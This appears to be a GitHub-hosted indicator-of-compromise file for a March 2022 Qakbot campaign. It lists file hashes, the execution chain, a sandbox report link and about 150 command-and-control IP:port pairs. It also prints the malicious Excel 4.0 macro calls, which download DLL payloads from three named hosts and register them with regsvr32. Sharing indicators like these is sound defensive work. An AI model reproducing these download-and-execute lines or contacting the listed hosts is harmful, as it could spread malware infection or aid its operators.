-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_AA_25.03.2022.txt
190 lines (174 loc) · 4.14 KB
/
Qakbot_AA_25.03.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
25.03.2022 | Qakbot | AA | Version 403.549
******************************
.xls f531746143a411ef1dec761fff6d71454c2e57863ae25dfa272a0b62b35d8c08
.dll 2608b4e01cfd647dcc1b2690f63be9c4d22db47a9da3305ae8be563e2098b71e
.dll 7b203314e7afb261fc218ec76894a9bde62016782055929917043a7fe99b58b3
.dll 588a56e98e71aaafe4a958db7c49326aeba2a2ce332e966b519540e49586807e
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Seng", 0)
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://urbizstartup.com/cyL5fzZgbH8/Hnfho.png", "C:\Seng\dsuh1.dll")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://aryanglobalschool.in/L2Xe4PaSpwYi/Hnfho.png", "C:\Seng\dsuh2.dll")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://gurunanakinternational.com/7ZflR1ubibNT/Hnfho.png", "C:\Seng\dsuh3.dll")
https://urbizstartup.com/cyL5fzZgbH8/Hnfho.png
https://aryanglobalschool.in/L2Xe4PaSpwYi/Hnfho.png
https://gurunanakinternational.com/7ZflR1ubibNT/Hnfho.png
******************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\mnatmeie.xls
regsvr32 C:\Seng\dsuh1.dll
regsvr32 C:\Seng\dsuh2.dll
regsvr32 C:\Seng\dsuh3.dll
*************************************************
https://tria.ge/220325-rnkrlsdggl/behavioral1
*************************************************
c2's
90.120.65.153:2078
179.100.109.11:32101
24.43.99.75:443
37.186.54.166:995
47.23.89.62:993
72.76.94.99:443
117.248.109.38:21
75.99.168.194:61201
31.215.69.127:443
45.9.20.200:443
203.122.46.130:443
173.174.216.62:443
144.202.2.175:995
149.28.238.199:443
140.82.63.183:443
45.63.1.12:443
140.82.63.183:995
144.202.3.39:995
45.63.1.12:995
45.76.167.26:995
45.76.167.26:443
149.28.238.199:995
144.202.3.39:443
144.202.2.175:443
190.206.211.182:443
86.195.158.178:2222
47.23.89.62:995
70.57.207.83:443
207.170.238.231:443
217.165.85.224:993
1.161.80.99:443
39.44.127.250:995
32.221.225.247:995
5.95.58.211:2087
180.233.150.134:995
45.241.207.212:995
188.55.248.211:995
71.13.93.154:2222
39.33.182.192:995
197.2.149.15:443
121.74.182.236:995
91.177.173.10:995
83.110.85.209:995
41.230.62.211:993
70.46.220.114:443
81.60.216.223:995
172.115.177.204:2222
103.88.226.82:443
80.11.74.81:2222
114.79.148.170:443
89.101.97.139:443
172.114.160.81:995
67.209.195.198:443
75.159.9.236:443
201.172.31.135:2222
24.178.196.158:2222
41.228.22.180:443
182.191.92.203:995
37.152.80.105:443
93.48.80.198:995
92.96.183.242:2222
24.152.219.253:995
113.11.89.170:995
195.32.57.18:80
197.161.137.196:993
39.57.112.37:995
105.186.127.127:995
78.87.196.125:995
217.128.122.65:2222
120.150.218.241:995
79.52.204.9:50001
41.215.152.154:995
2.42.176.91:443
86.98.208.214:2222
190.73.3.148:2222
76.70.9.169:2222
119.158.97.217:995
74.15.2.252:2222
209.180.70.25:443
75.99.168.194:443
118.174.95.247:443
76.69.155.202:2222
78.188.76.167:443
189.146.51.56:443
108.60.213.141:443
177.97.48.132:443
176.67.56.94:443
208.107.221.224:443
148.64.96.100:443
47.180.172.159:443
140.82.49.12:443
92.96.183.242:1194
92.177.45.46:2078
96.21.251.127:2222
161.142.56.8:443
39.49.35.170:995
1.161.80.99:995
175.145.235.37:443
83.110.85.209:443
31.35.28.29:443
202.134.152.2:2222
86.98.27.253:443
5.32.41.45:443
75.188.35.168:443
103.230.180.98:443
76.25.142.196:443
173.21.10.71:2222
189.237.6.251:443
76.169.147.192:32103
71.74.12.34:443
67.165.206.193:993
47.158.25.67:443
73.151.236.31:443
174.69.215.101:443
82.41.63.217:443
45.46.53.140:2222
201.145.226.223:443
201.170.181.247:443
191.99.191.28:443
47.180.172.159:50010
69.159.200.138:2222
201.103.6.221:443
47.156.191.217:443
72.252.201.34:990
63.143.92.99:995
72.12.115.90:22
108.4.67.252:443
189.248.86.71:443
40.134.246.185:995
70.51.135.39:2222
100.1.108.246:443
24.229.150.54:995
24.55.67.176:443
72.252.201.34:995
105.225.175.168:995
179.158.105.44:443
179.178.78.112:443
200.100.246.85:32101
109.12.111.14:443
2.34.12.8:443
143.0.34.185:443
81.132.186.248:2078
82.152.39.39:443
201.172.231.204:443
186.106.197.52:443
187.211.77.68:443
196.203.37.215:80
111.125.245.118:995
176.88.238.122:995
120.61.1.91:443